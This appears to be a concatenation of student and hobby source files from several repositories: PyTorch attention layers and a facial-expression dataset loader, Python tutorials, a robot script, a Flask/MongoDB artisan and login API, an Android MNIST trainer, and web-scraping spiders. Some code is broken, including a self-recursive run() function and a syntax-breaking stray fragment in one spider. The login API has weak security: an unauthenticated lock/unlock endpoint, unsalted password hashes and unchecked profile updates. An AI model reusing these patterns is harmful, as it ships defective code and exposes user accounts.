return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class PSAModule(nn.Module):
def __init__(self, inplans, planes, conv_kernels=[3, 5, 7, 9], stride=1, conv_groups=[1, 4, 8, 16]):
super(PSAModule, self).__init__()
self.conv_1 = conv(inplans, planes//4, kernel_size=conv_kernels[0], padding=conv_kernels[0]//2,
stride=stride, groups=conv_groups[0])
self.conv_2 = conv(inplans, planes//4, kernel_size=conv_kernels[1], padding=conv_kernels[1]//2,
stride=stride, groups=conv_groups[1])
self.conv_3 = conv(inplans, planes//4, kernel_size=conv_kernels[2], padding=conv_kernels[2]//2,
stride=stride, groups=conv_groups[2])
self.conv_4 = conv(inplans, planes//4, kernel_size=conv_kernels[3], padding=conv_kernels[3]//2,
stride=stride, groups=conv_groups[3])
self.se = SEWeightModule(planes // 4)
self.split_channel = planes // 4
self.softmax = nn.Softmax(dim=1)
def forward(self, x):
batch_size = x.shape[0]
x1 = self.conv_1(x)
x2 = self.conv_2(x)
x3 = self.conv_3(x)
x4 = self.conv_4(x)
feats = torch.cat((x1, x2, x3, x4), dim=1)
feats = feats.view(batch_size, 4, self.split_channel, feats.shape[2], feats.shape[3])
x1_se = self.se(x1)
x2_se = self.se(x2)
x3_se = self.se(x3)
x4_se = self.se(x4)
x_se = torch.cat((x1_se, x2_se, x3_se, x4_se), dim=1)
attention_vectors = x_se.view(batch_size, 4, self.split_channel, 1, 1)
attention_vectors = self.softmax(attention_vectors)
feats_weight = feats * attention_vectors
for i in range(4):
x_se_weight_fp = feats_weight[:, i, :, :]
if i == 0:
out = x_se_weight_fp
else:
out = torch.cat((x_se_weight_fp, out), 1)
return out
if __name__=='__main__':
model = NonLocalBlock(in_channels=16)
print(model)
input = torch.randn(1, 16, 64, 64)
out = model(input)
print(out.shape)
in_tensor = torch.ones((12, 64, 128, 128))
cb = ContextBlock(inplanes=64, ratio=1./16.,pooling_type='att')
out_tensor = cb(in_tensor)
print(in_tensor.shape)
print(out_tensor.shape)
in_channels = 64
pool_size = (3, 3)
norm_layer = nn.BatchNorm2d
up_kwargs = {
'scale_factor': None,
'mode': 'bilinear',
'align_corners': False
}
x = torch.rand(size=(4, in_channels, 16, 16))
sp = StripPooling(in_channels, pool_size, up_kwargs, norm_layer)
y = sp(x)
print(x.shape, y.shape)
in_channels = 512
inter_channels = 512
x = torch.randn(size=(4, in_channels, 16, 16))
model = BilinearCNN(in_channels=in_channels, inter_channels=inter_channels, drop=0.5)
y = model(x)
print(x.shape, y.shape)
x = torch.rand(size=(4, 64, 224, 224))
model = PSAModule(inplans=64, planes=64, stride=2)
y = model(x)
print(x.shape, y.shape)
```
#### File: FER/models/lightcnn_at.py
```python
import torch.nn as nn
from .lightcnn import LightCNN, LowHead
from .at import (
ContextBlock,
StripPooling,
)
def getATModule(at_type):
if at_type == 'CB':
return ContextBlock
if at_type == 'SP':
return StripPooling
raise NotImplementedError('{} not implemented'.format(at_type))
class LightCNNAT(LightCNN):
def __init__(self, low_head, at_type, at_kws, filters=[64, 128, 256, 512, 1024], num_classes=7, at_layer=[0, 0, 0, 0, 1]):
super(LightCNNAT, self).__init__(low_head, filters, num_classes)
at_model = getATModule(at_type)
self.at_layer = at_layer
if self.at_layer[0]:
self.at0 = at_model(**at_kws[0])
if self.at_layer[1]:
self.at1 = at_model(**at_kws[1])
if self.at_layer[2]:
self.at2 = at_model(**at_kws[2])
if self.at_layer[3]:
self.at3 = at_model(**at_kws[3])
if self.at_layer[4]:
self.at4 = at_model(**at_kws[4])
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu")
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def forward(self, x):
x = self.low_head(x)
if self.at_layer[0]:
x = self.at0(x)
x = self.layer1(x)
if self.at_layer[1]:
x = self.at1(x)
x = self.layer2(x)
if self.at_layer[2]:
x = self.at2(x)
x = self.layer3(x)
if self.at_layer[3]:
x = self.at3(x)
x = self.layer4(x)
if self.at_layer[4]:
x = self.at4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def make_lightcnn_at(in_channels, at_type, at_kws, num_classes=7, weight_path="",
filters=[64, 128, 256, 518, 1024], at_layer=[0, 0, 0, 0, 1], drop=0.):
filters = filters
low_head = LowHead(in_channels, filters[0])
at_layer = at_layer
model = LightCNNAT(low_head=low_head, at_type=at_type, at_kws=at_kws, filters=filters, num_classes=num_classes, at_layer=at_layer)
if drop > 0:
model.fc = nn.Sequential(
nn.Dropout(drop),
nn.Linear(filters[-1], num_classes)
)
return model
def lightcnn_at(in_channels, num_classes=7, weight_path="", **kw):
filters = kw['filters'] if 'filters' in kw else [64, 128, 256, 518, 1024]
at_layer = kw['at_layer'] if 'at_layer' in kw else [0, 0, 0, 0, 1]
drop = kw['drop'] if 'drop' in kw else 0.0
at_type = kw['at_type'] if 'at_type' in kw else 'CB'
at_kws = kw['at_kws'] if 'at_kws' in kw else [
{
'inplanes': filters[i]
} for i in range(len(filters))
]
return make_lightcnn_at(in_channels=in_channels, at_type=at_type, at_kws=at_kws,
num_classes=num_classes, weight_path=weight_path,
filters=filters, at_layer=at_layer, drop=drop)
```
#### File: utils/datasets/ferplus_dataset.py
```python
from torchvision.transforms import ToTensor, Normalize
from torch.utils.data import Dataset
from skimage import io
from PIL import Image
import numpy as np
import pandas
import torch
# Standard Libraries
from os import path, listdir
import sys
import csv
import re
# Modules
from utils import uimage
from utils.augmenters.augment import seg
class FERPlus(Dataset):
def __init__(self, idx_set=0, image_size=(96, 96), tta=False, tta_size=48,
max_loaded_images_per_label=10000, transforms=None, base_path_to_FER_plus=None):
"""
Code based on https://github.com/microsoft/FERPlus.
:param idx_set: Labeled = 0, Validation = 1, Test = 2
:param max_loaded_images_per_label: Maximum number of images per label
:param transforms: transforms (callable, optional): Optional transform to be applied on a sample.
"""
self.idx_set = idx_set
self.max_loaded_images_per_label = max_loaded_images_per_label
self.transforms = transforms
self.base_path_to_FER_plus = base_path_to_FER_plus
self.fer_sets = {0: 'FER2013Train/', 1: 'FER2013Valid/', 2: 'FER2013Test/'}
self.image_size = image_size
self._tta = tta
self._tta_size = tta_size
# Default values
self.num_labels = 8
self.mean = [0.0, 0.0, 0.0]
self.std = [1.0, 1.0, 1.0]
# Load data
self.loaded_data = self._load()
print('Size of the loaded set: {}'.format(self.loaded_data[0].shape[0]))
def is_tta(self):
return self._tta == True
def __len__(self):
return self.loaded_data[0].shape[0]
def __getitem__(self, idx):
sample = {'image': self.loaded_data[0][idx], 'emotion': self.loaded_data[1][idx]}
# train
if self.idx_set == 0:
sample['image'] = seg(image=sample['image'])
if not (self.transforms is None):
sample['image'] = self.transforms(sample['image'])
return Normalize(mean=self.mean, std=self.std)(ToTensor()(sample['image'])), sample['emotion']
def online_normalization(self, x):
return Normalize(mean=self.mean, std=self.std)(ToTensor()(x))
def norm_input_to_orig_input(self, x):
x_r = torch.zeros(x.size())
x_r[0] = (x[2] * self.std[2]) + self.mean[2]
x_r[1] = (x[1] * self.std[1]) + self.mean[1]
x_r[2] = (x[0] * self.std[0]) + self.mean[0]
return x_r
@staticmethod
def get_class(idx):
classes = {
0: 'Neutral',
1: 'Happy',
2: 'Sad',
3: 'Surprise',
4: 'Fear',
5: 'Disgust',
6: 'Anger',
7: 'Contempt'}
return classes[idx]
@staticmethod
def _parse_to_label(idx):
"""
Parse labels to make them compatible with AffectNet.
:param idx:
:return:
"""
emo_to_return = np.argmax(idx)
if emo_to_return == 2:
emo_to_return = 3
elif emo_to_return == 3:
emo_to_return = 2
elif emo_to_return == 4:
emo_to_return = 6
elif emo_to_return == 6:
emo_to_return = 4
return emo_to_return
@staticmethod
def _process_data(emotion_raw):
size = len(emotion_raw)
emotion_unknown = [0.0] * size
emotion_unknown[-2] = 1.0
# remove emotions with a single vote (outlier removal)
for i in range(size):
if emotion_raw[i] < 1.0 + sys.float_info.epsilon:
emotion_raw[i] = 0.0
sum_list = sum(emotion_raw)
emotion = [0.0] * size
# find the peak value of the emo_raw list
maxval = max(emotion_raw)
if maxval > 0.5 * sum_list:
emotion[np.argmax(emotion_raw)] = maxval
else:
emotion = emotion_unknown # force setting as unknown
return [float(i) / sum(emotion) for i in emotion]
def _load(self):
csv_label = []
data, labels = [], []
counter_loaded_images_per_label = [0 for _ in range(self.num_labels)]
path_folders_images = path.join(self.base_path_to_FER_plus, 'Images', self.fer_sets[self.idx_set])
path_folders_labels = path.join(self.base_path_to_FER_plus, 'Labels', self.fer_sets[self.idx_set])
with open(path_folders_labels + '/label.csv') as csvfile:
lines = csv.reader(csvfile)
for row in lines:
csv_label.append(row)
# Shuffle training set
if self.idx_set == 0:
np.random.shuffle(csv_label)
for l in csv_label:
emotion_raw = list(map(float, l[2:len(l)]))
emotion = self._process_data(emotion_raw)
emotion = emotion[:-2]
try:
emotion = [float(i) / sum(emotion) for i in emotion]
emotion = self._parse_to_label(emotion)
except ZeroDivisionError:
emotion = 9
if (emotion < self.num_labels) and (counter_loaded_images_per_label[int(emotion)] < self.max_loaded_images_per_label):
counter_loaded_images_per_label[int(emotion)] += 1
img = np.array(uimage.read(path.join(path_folders_images, l[0])), np.uint8)
box = list(map(int, l[1][1:-1].split(',')))
if box[-1] != 48:
print("[INFO] Face is not centralized.")
print(path.join(path_folders_images, l[0]))
print(box)
exit(-1)
img = img[box[0]:box[2], box[1]:box[3], :]
img = uimage.resize(img, self.image_size)
data.append(img)
labels.append(emotion)
has_loading_finished = (np.sum(counter_loaded_images_per_label) >= (self.max_loaded_images_per_label * self.num_labels))
if has_loading_finished:
break
return [np.array(data), np.array(labels)]
``` |
{
"source": "20-1-SKKU-OSS/c9-python-getting-started",
"score": 3
} |
#### File: more-python-for-beginners/01 - Formatting and linting/bad.py
```python
x = 12
if x == 24:
print('Is valid')
else:
print("Not valid")
def helper(name='sample'):
pass
def another(name = 'sample'):
pass
```
#### File: python-for-beginners/18 - Decorators/decorators_simple.py
```python
def decorator_function(original_function):
def wrapper_function():
print('{} function is about to be called'.format(original_function.__name__))
return original_function()
return wrapper_function
# Define normal function that print one line
def display_1():
print('display_1 function is running.')
# Define normal function that print one line
def display_2():
print('display_2 function is running.')
# Define with @decorator_function
@decorator_function
def display_3():
print('display_3 function is running.')
# Reassign display_1 function to use decorator function
display_1 = decorator_function(display_1)
# This will be called with decorator function, because of reassigning
display_1()
print()
# This will be called with decorator function
decorator_function(display_2)()
print()
# This will be called without decorator function
display_2()
print()
# This will be called with decorator function, because of @decorator_function
display_3()
``` |
{
"source": "2020-2021-s2-autonomous-robotics-b/psb-noah.github.io",
"score": 3
} |
#### File: 2020-2021-s2-autonomous-robotics-b/psb-noah.github.io/first.py
```python
from locorobo import LocoRobo
from locorobo import MotorDirection
from locorobo import Data
from locorobo import WaitType
from locorobo import Song
from locorobo import Note
def get_robot(robots, name):
robot = None
# Search through robots found during the scan for
# the one we want
for r in robots.values():
if r.name == name:
robot = r
# We found the robot, so stop the for loop
break
# If we did not find the robot during the scan, stop the program
if not robot:
raise Exception('Could not find robot with specified name')
return robot
def main():
# Tell LocoRobo what serial port to use
LocoRobo.setup("/dev/tty.usbmodem1")
# Scan for robots
robots = LocoRobo.scan(2000)
# Use get_robots to find robot with name lr d2:fa in the scan result
robot = get_robot(robots, "lr d2:fa")
robot.connect()
robot.activate_motors()
robot.enable_sensor(Data.ULTRASONIC, True)
#setup the distance to be travelled in centimeters
distance_cm = 100
# tried to use ultrasonic sensors to detect how far away a wall was, didn't go too well
# distance_cm = robot.get_sensor_value(Data.ULTRASONIC) - 10 #so that the robot doesn't HIT the wall
# print(distance_cm)
robot.setup_wait(WaitType.DISTANCE, distance_cm * 1000)
robot.move(MotorDirection.FORWARD, MotorDirection.FORWARD, 1, 1, True)
robot.deactivate_motors()
robot.disconnect()
# If we are on the main thread, run the program
if __name__ == "__main__":
try:
main()
except:
LocoRobo.stop()
raise
LocoRobo.stop()
# For compatibility with webapp's python, we can't use finally.
# If you are using local python, you can do the following
#
# try:
# main()
# finally:
# LocoRobo.stop()
``` |
{
"source": "2020-A-JS-GR1/py-velasquez-revelo-jefferson-david",
"score": 3
} |
#### File: ProyectoGrupal2B/api/artesanosController.py
```python
from flask import Flask, request
from flask_restplus import Namespace, Resource, Api, fields
import pymongo
from bson import ObjectId
from database import get_db
api = Namespace('artesanos', description='artesanos related operations')
artesanosParser = api.parser()
artesanosParser.add_argument(
'page', type=int, help='page number', location='head')
artesanosParser.add_argument('pageSize', type=int,
help='page size', location='head')
queryArtesanos = {"tipoUser": 1,
"tipoId": 1,
"identificacion": 1,
"email": 1,
"apellidos": 1,
"nombres": 1,
"direccion": 1,
"ubicacion": 1,
"telefonos": 1,
"estado": 1,
"intentos": 1,
"servicios": 1
}
servicesParser = api.parser()
servicesParser.add_argument(
'page', type=int, help='page number', location='head')
servicesParser.add_argument('pageSize', type=int,
help='page size', location='head')
servicesParser.add_argument('service', type=str,
help='serviceName', location='head')
allParser = api.parser()
allParser.add_argument(
'page', type=int, help='page number', location='head')
allParser.add_argument('pageSize', type=int,
help='page size', location='head')
allParser.add_argument('service', type=str,
help='serviceName', location='head')
allParser.add_argument('canton', type=str,
help='canton', location='head')
allParser.add_argument('parroquia', type=str,
help='parroquia', location='head')
queryServices = {"tipoUser": 1,
"tipoId": 1,
"identificacion": 1,
"email": 1,
"apellidos": 1,
"nombres": 1,
"direccion": 1,
"ubicacion": 1,
"telefonos": 1,
"estado": 1,
"intentos": 1,
"servicios": 1
}
@api.route('/')
class Artesanos(Resource):
@api.doc(parser=artesanosParser)
def get(self):
db = get_db()
args = request.args
page = int(args['page'])
pageSize = int(args['pageSize'])
people = list(db["users"].find({"tipoUser": "artesano"}, queryArtesanos).skip(
page * pageSize).limit(pageSize))
for person in people:
person['_id'] = str(person['_id'])
return {"total": db["users"].count_documents({"tipoUser": "artesano"}), "items": people}, 200
@api.route('/artesanos-by-service')
class ArtesanosService(Resource):
@api.doc(parser=servicesParser)
def get(self):
db = get_db()
args = request.args
page = int(args['page'])
pageSize = int(args['pageSize'])
if args['service']:
people = list(db["users"].find({"tipoUser": "artesano", "servicios": args['service']}, queryServices).skip(
page * pageSize).limit(pageSize))
else:
people = list(db["users"].find({"tipoUser": "artesano"}, queryServices).skip(
page * pageSize).limit(pageSize))
for person in people:
person['_id'] = str(person['_id'])
return {"total": db["users"].count_documents({"tipoUser": "artesano", "servicios": args['service']}), "items": people}, 200
@api.route('/artesanos-by-all')
class ArtesanosService2(Resource):
@api.doc(parser=allParser)
def get(self):
db = get_db()
args = request.args
page = int(args['page'])
pageSize = int(args['pageSize'])
if args['service'] and args['canton'] and args['parroquia']:
people = list(db["users"].find({"tipoUser": "artesano", "servicios": args['service'], "ubicacion.parroquia": args['parroquia']}, queryServices).skip(
page * pageSize).limit(pageSize))
else:
people = list(db["users"].find({"tipoUser": "artesano"}, queryServices).skip(
page * pageSize).limit(pageSize))
for person in people:
person['_id'] = str(person['_id'])
return {"total": len(people), "items": people}, 200
```
#### File: ProyectoGrupal2B/api/sessionsController.py
```python
from flask import Flask, request
from flask_restplus import Namespace, Resource, Api, fields
import pymongo
from bson import ObjectId
from database import get_db
import hashlib
api = Namespace('sessions', description='Session related operations')
sessionPayload = api.model('sessionPayload', {
"email": fields.String,
"password": fields.String
})
passwordPayload = api.model('passwordPayload', {
"oldPassword": fields.String,
"newPassword": fields.String
})
lockUsersPayload = api.model('lockUsersPayload',{
"action": fields.String
})
@api.route('/')
class Sessions(Resource):
@api.expect(sessionPayload)
def post(self):
collection = get_db()["users"]
body = api.payload
if body:
body['password'] = str(hashlib.sha256(
body['password'].encode()).hexdigest())
user = collection.find_one({"email": body["email"]})
if user is None:
return {"invaliCredentials": True}, 401
if user['password'] == body['password'] and user['intentos'] < 3 and user['estado']:
collection.update_one({"email": body["email"]}, {
"$set": {"intentos": 0}})
return {"_id" : str(user['_id'])}, 200
elif user['intentos'] >= 3 and user['estado']:
collection.update_one({"email": body["email"]}, {
"$set": {"estado": False}})
return {"userBlocked": True}, 403
elif not user['estado']:
return {"userBlocked": True}, 403
elif not user['estado']:
return {"userBlocked": True}, 403
collection.update_one({"email": body["email"]}, {
"$inc": {"intentos": 1}})
return {"invaliCredentials": True}, 401
@api.route('/<string:id>')
class Session(Resource):
@api.expect(passwordPayload)
def put(self, id):
collection = get_db()["users"]
body = api.payload
body['oldPassword'] = str(hashlib.sha256(
body['oldPassword'].encode()).hexdigest())
body['newPassword'] = str(hashlib.sha256(
body['newPassword'].encode()).hexdigest())
user = collection.find_one({"_id": ObjectId(id)})
if user is None:
return {"id": id}, 404
elif user['password'] == body['oldPassword']:
collection.update_one({"_id": ObjectId(id)}, {"$set": {"password": body['newPassword']}})
return {"passwordUpdated": True}, 200
return {"passwordUpdated": False}, 403
@api.route('/unlock-users/<string:id>')
class Lock(Resource):
@api.expect(lockUsersPayload)
def post(self, id):
collection = get_db()["users"]
user = collection.find_one({"_id": ObjectId(id)})
if user is None:
return {"id": id}, 404
body = api.payload
status = True
if body['action'] == "lock":
status = False
elif body['action'] == "unlock":
status = True
collection.update_one({"_id": ObjectId(id)}, {"$set": {"estado": status, "intentos": 0}})
return {"UserIsLocked": not status}, 200
```
#### File: ProyectoGrupal2B/api/usersController.py
```python
from flask import Flask, request
from flask_restplus import Namespace, Resource, Api, fields
import pymongo
from bson import ObjectId
from database import get_db
import hashlib
api = Namespace('users', description='User related operations')
locationPayload = api.model('locationPayload', {
"provincia": fields.String,
"canton": fields.String,
"parroquia": fields.String
})
userPayload = api.model('userPayload', {
"tipoUser" : fields.String(["admin","cliente","artesano"]),
"tipoId" : fields.String,
"identificacion": fields.String,
"email" : fields.String,
"apellidos": fields.String,
"nombres": fields.String,
"direccion": fields.String,
"ubicacion": fields.Nested(locationPayload),
"telefonos" : fields.List(fields.String),
"password" : fields.String, #el password se almacena hasheado como MD5
"estado": fields.Boolean, #activo 1, inactivo 0
"intentos": fields.Integer, #numero de intentos para el login, max 3
"servicios" : fields.List(fields.String) #solo si es artesano
})
userUpdatePayload = api.model('userUpdatePayload', {
"tipoUser": fields.String(["admin", "cliente", "artesano"]),
"tipoId": fields.String,
"identificacion": fields.String,
"email": fields.String,
"apellidos": fields.String,
"nombres": fields.String,
"direccion": fields.String,
"ubicacion": fields.Nested(locationPayload),
"telefonos": fields.List(fields.String),
"estado" : fields.Boolean,
"intentos": fields.Integer,
"servicios": fields.List(fields.String)
})
queryUsers = {"tipoUser": 1,
"tipoId": 1,
"identificacion": 1,
"email": 1,
"apellidos": 1,
"nombres": 1,
"direccion": 1,
"ubicacion": 1,
"telefonos": 1,
"estado": 1,
"intentos": 1,
"servicios": 1
}
userParser = api.parser()
userParser.add_argument(
'page', type=int, help='page number', location='head')
userParser.add_argument('pageSize', type=int,
help='page size', location='head')
@api.route('/')
class People(Resource):
@api.doc(parser=userParser)
def get(self):
db = get_db()
args = request.args
page = int(args['page'])
pageSize = int(args['pageSize'])
people = list(db["users"].find({}, queryUsers).skip(
page * pageSize).limit(pageSize))
for person in people:
person['_id'] = str(person['_id'])
return {"total": db['users'].count_documents({}), "items": people}, 200
@api.expect(userPayload)
def post(self):
db = get_db()
body = api.payload
body['password'] = str(hashlib.sha256(body['password'].encode()).hexdigest())
if db["users"].find_one({"tipoId": body["tipoId"], "identificacion": body["identificacion"]}) or db["users"].find_one({"email": body["email"]}):
return {"personExists": True}, 400
res = db["users"].insert_one(body)
return {"_id": str(res.inserted_id)}, 200
@api.route('/<string:id>')
class Person(Resource):
def get(self, id):
db = get_db()
res = db["users"].find_one({"_id": ObjectId(id)}, queryUsers)
if res is None:
return {"id": id}, 404
res['_id'] = str(res['_id'])
return res, 200
def delete(self, id):
db = get_db()
res = db['users'].delete_one({"_id": ObjectId(id)})
if res.deleted_count <= 0:
return {"_id": id}, 404
return {}, 200
@api.expect(userPayload)
def put(self, id):
db = get_db()
body = api.payload
person = db['users'].find_one({"_id": ObjectId(id)})
if person == None:
return {"id": id}, 404
db['users'].update_one({"_id": ObjectId(id)}, {"$set" : body})
person = db['users'].find_one({"_id": ObjectId(id)})
person['_id'] = str(person['_id'])
return person, 200
```
#### File: ProyectoGrupal2B/app/routes.py
```python
import flask
from flask import render_template
import requests
import flask_login
from app import app
from .user import User
@app.route('/')
@app.route('/index')
def index():
return render_template('index.html', title='Home')
@app.route('/BusquedaArtesanos')
def BusquedaArtesanos():
return render_template('BusquedaArtesanos.html', title='Buscar Artesanos')
@app.route('/RegistrarArtesano')
def RegistrarArtesano():
return render_template('RegistrarArtesano.html', title='Registrar Artesanos')
@app.route('/InscripcionCurso')
def InscripcionCurso():
return render_template('InscripcionCurso.html', title='Inscripcion a Curso')
@app.route('/RegistrarAcuerdo')
def RegistrarAcuerdo():
return render_template('RegistrarAcuerdo.html', title='Registrar Acuerdo')
@app.route('/CrearCurso')
def CrearCurso():
return render_template('CrearCurso.html', title='Crear Curso')
@app.route('/InfoCurso')
def InfoCurso():
return render_template('InfoCurso.html', title='Informacion de Curso')
@app.route('/Login', methods=['GET', 'POST'])
def Login():
if flask.request.method == 'GET':
return render_template('login.html', title='Login')
email = flask.request.form.get('email')
password = flask.request.form['password']
res = requests.post('http://127.0.0.1:5000/sessions/', json={"email": email,
"password": password})
if res.status_code == 200:
usrid = res.json()['_id']
user = User()
user.id = usrid
flask_login.login_user(user)
return flask.redirect(flask.url_for('protected'))
return 'Bad login'
@app.route('/NuevoInstructor')
def NuevoInstructor():
return render_template('NuevoInstructor.html', title='Nuevo Instructor de Curso')
@app.route('/Registrate')
def Registrate():
return render_template('registrate.html', title='Registrarse al Sistema')
#@app.route('/RegistrarArtesano/<string:id>')
#def getID(id):
# idpagina = {'pagina': id}
# return render_template('RegistrarArtesano.html', title='Registrar Artesanos', idpagina=idpagina)
``` |
{
"source": "2020akumar/MLTest",
"score": 3
} |
#### File: main/python/main.py
```python
from android.os import Environment
from tensorflow.python import keras
import tensorflow as tf
from tensorflow.python.keras.datasets import mnist
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Dense,Dropout,Activation,Flatten
from tensorflow.python.keras.layers import Conv2D, MaxPooling2D
from tensorflow.python.keras .callbacks import Callback
import time
import os
import gc
import random
import cv2
import numpy as np
# numt=0
class TimeStop(Callback):
def __init__(self,seconds=0):
super(Callback,self).__init__()
self.start_time=0
self.seconds=seconds
def on_train_begin(self, logs=None):
self.start_time=time.time()
def on_batch_end(self, batch, logs=None):
print(time.time()-self.start_time)
if time.time()-self.start_time>self.seconds:
self.model.stop_training=True
print("Stopped after %s seconds"%(self.seconds))
def main(second=150,conv=2,dens=2 ):
print(tf.__version__)
keras.backend.clear_session()
tf.reset_default_graph()
graph=tf.get_default_graph()
with graph.as_default():
print(second)
batch_size=32
classes=10
epochs=5
img_rows, img_cols = 28, 28
(xtr,ytr),(xtst,ytst)=mnist.load_data()
xtr = xtr.reshape(xtr.shape[0], img_rows, img_cols, 1)
xtst = xtst.reshape(xtst.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
ytr=keras.utils.to_categorical(ytr,classes)
ytst=keras.utils.to_categorical(ytst,classes)
model= Sequential()
model.add(Conv2D(32,(3,3),input_shape=input_shape))
model.add(Activation('relu'))
for aa in range(0,conv-1):
model.add(Conv2D(32,(3,3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
# model.add(Conv2D(64,(3,3)))
# model.add(Activation('relu'))
# model.add(Conv2D(64,(3,3)))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2,2)))
# model.add(Dropout(0.25))
model.add(Flatten())
for bb in range(1, dens):
model.add(Dense(512//bb))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(classes))
model.add(Activation('softmax'))
# global numt
# opt=keras.optimizers.Adam(lr=.0001,decay=1e-7)
# optimizers=["adam","nadam","adamax"]
model.compile(loss="categorical_crossentropy",optimizer="adam",metrics=['accuracy'])
# numt+=1
xtr=xtr.astype('float32')
xtst=xtst.astype('float32')
xtr/=255
xtst/=255
stopper=TimeStop(seconds=second)
model.fit(xtr,ytr,batch_size=batch_size,epochs=epochs,validation_data=(xtst,ytst),shuffle=True,callbacks=[stopper])
randomSam=random.randint(0,len(xtst)-1000)
scores=model.evaluate(xtst[randomSam:randomSam+1000],ytst[randomSam:randomSam+1000],verbose=1)
print("Loss:",scores[0] )
print("Accuracy:",scores[1])
#model.save('model.h5')
d = str(Environment.getExternalStorageDirectory())
model.save(d+"/model.h5")
del model
gc.collect()
# keras.backend.clear_session()
# tf.reset_default_graph()
# graph = tf.get_default_graph()
return scores[1]
def run(byte):
byter=bytes(byte)
keras.backend.clear_session()
img_rows, img_cols = 28, 28
d = str(Environment.getExternalStorageDirectory())
new_model=tf.keras.models.load_model(d+"/model.h5")
img=cv2.imdecode(np.frombuffer(byter,np.uint8),-1)
img_rgb=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
img = cv2.resize(img_rgb, (img_rows, img_cols), interpolation=cv2.INTER_AREA)
img=cv2.bitwise_not(img)
print("writing image")
cv2.imwrite(d+"/processedImage.jpg", img)
print("saved")
print('here')
print(img.shape)
img=np.asarray(img)
print(img.shape)
img=np.expand_dims(img,axis=0)
img=np.expand_dims(img,axis=4)
# classes = 10
# (xtr, ytr), (xtst, ytst) = mnist.load_data()
#
# xtr = xtr.reshape(xtr.shape[0], img_rows, img_cols, 1)
# xtst = xtst.reshape(xtst.shape[0], img_rows, img_cols, 1)
# randomSam = random.randint(0, len(xtst) - 1000)
# ytr = keras.utils.to_categorical(ytr, classes)
# ytst = keras.utils.to_categorical(ytst, classes)
# scores = new_model.evaluate(xtst[randomSam:randomSam + 1000], ytst[randomSam:randomSam + 1000], verbose=1)
# print("Loss:", scores[0])
# print("Accuracy:", scores[1])
# print( new_model.summary())
run(bytearray)
result=new_model.predict(img,1)
print(result)
return np.argmax(result[0])
def test(byte):
# direct=str(Environment.getExternalStorageDirectory())
# print(os.listdir(direct));
# print (os.listdir("storage/emulated/0/DCIM"))
# # img=cv2.cvtColor(cv2.imread(direct+filename),cv2.COLOR_BGR2GRAY)
# img=cv2.imread(direct+filename)
# print(img.shape)
# return str(image.shape)
print(type(byte))
byte=bytes(byte)
print(type(byte))
img=cv2.imdecode(np.frombuffer(byte,np.uint8),-1)
img_rgb=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
print(img_rgb.shape)
#main(10, 2,2)
#run("C:\\Users\\adity\\Documents\\mn.png")
# main(10,2,3)
#C:\Users\adity\Downloads\test.jpg
``` |
{
"source": "2020-A-Python-GR1/py-sanango-simbana-edison-ubaldo",
"score": 3
} |
#### File: arania_basica/spiders/arania_ejemplo.py
```python
import scrapy
class IntroSpider(scrapy.Spider):
name = 'introduccion_spider'
urls = [
'http://books.toscrape.com/catalogue/category/books/travel_2/index.html'
]
def start_requests(self):
for url in self.urls:
yield scrapy.Request(url=url)
def parse(self, response):
etiqueta_contenedora = response.css(
'article.product_pod'
)
# titulos
titulos = etiqueta_contenedora.css(
'h3 > a::text'
).extract()
print("**************TITULOS******************* {}".format(titulos))
# url
url = etiqueta_contenedora.css(
"div.image_container > a > img.thumbnail::attr(src)"
).extract()
print("**************URL********** {}".format(url))
# stock
stock = etiqueta_contenedora.css(
"div.product_price > p.instock.availability::text"
).extract()
stock_lista = list()
for i in stock:
aux = i.split('\n')
if len(aux) > 2:
stock_lista.append(aux[2])<class 'float'>
print("**********STOCK************* {}".format(stock_lista))
# dinero
dinero = etiqueta_contenedora.css(
"div.product_price > p.price_color::text"
).extract()
dinero_lista = list()
for i in dinero:
dinero_lista.append(float(i.split('£')[1]))
print("*******DINERO*********** {}".format(dinero_lista))
print(type(dinero_lista[0]))
# stars
estrellas = etiqueta_contenedora.css(
"article.product_pod > p::attr(class)"
).extract()
estrellas_lista = list()
for i in estrellas:
estrellas_lista.append(i.split('star-rating ')[1])
print("**************ESTRELLAS*********** {}".format(estrellas_lista))
# para ejecutar se hace lo siguiente:
# scrapy crawl name // en este caso name es introduccion_spider
```
#### File: fybeca/spiders/arania_fybeca.py
```python
import scrapy
import pandas as pd
class IntroSpider(scrapy.Spider):
name = 'fybeca_spider'
urls = [
'https://www.fybeca.com/FybecaWeb/pages/search-results.jsf?cat=639&s=0&pp=25'
]
def start_requests(self):
for url in self.urls:
yield scrapy.Request(url=url)
def parse(self, response):
etiqueta_contenedora = response.css(
'div.product-tile-inner'
)
# nombres productos
productos = list(etiqueta_contenedora.css(
"a.name::text"
).extract())
# imagen
url = list(etiqueta_contenedora.css(
"div.detail > a.image > img#gImg.productImage::attr(src)"
).extract())
# precio original
precio_original = etiqueta_contenedora.css(
"div.detail > div.side > div.price::attr(data-bind)"
).extract()
# precio miembro
precio_miembro = list(etiqueta_contenedora.css(
"div.detail > div.side > div.price-member > div::attr(data-bind)"
).extract())
# limpieza de datos
precio_miembro_final = list()
for i in precio_miembro:
precio = float(i.replace("text:'$' + (","").replace(").formatMoney(2, '.', ',')",""))
precio_miembro_final.append(precio)
precio_original_final = list()
for i in precio_original:
precio = float(i.replace("text:'$' + (","").replace(").formatMoney(2, '.', ',')",""))
precio_original_final.append(precio)
resultado = pd.DataFrame(zip(productos,
url,
precio_original_final,
precio_miembro_final), columns=['Productos','Imagen','Precio normal', 'Precio miembro'])
resultado['Diferencia precios'] = resultado['Precio normal'] - resultado['Precio miembro']
#resultado = resultado.sort_values(by='Diferencia precios',ascending=False)
print(resultado)
# RESPUESTAS
# cual es el item con mayor y menor precio -- por precio normales
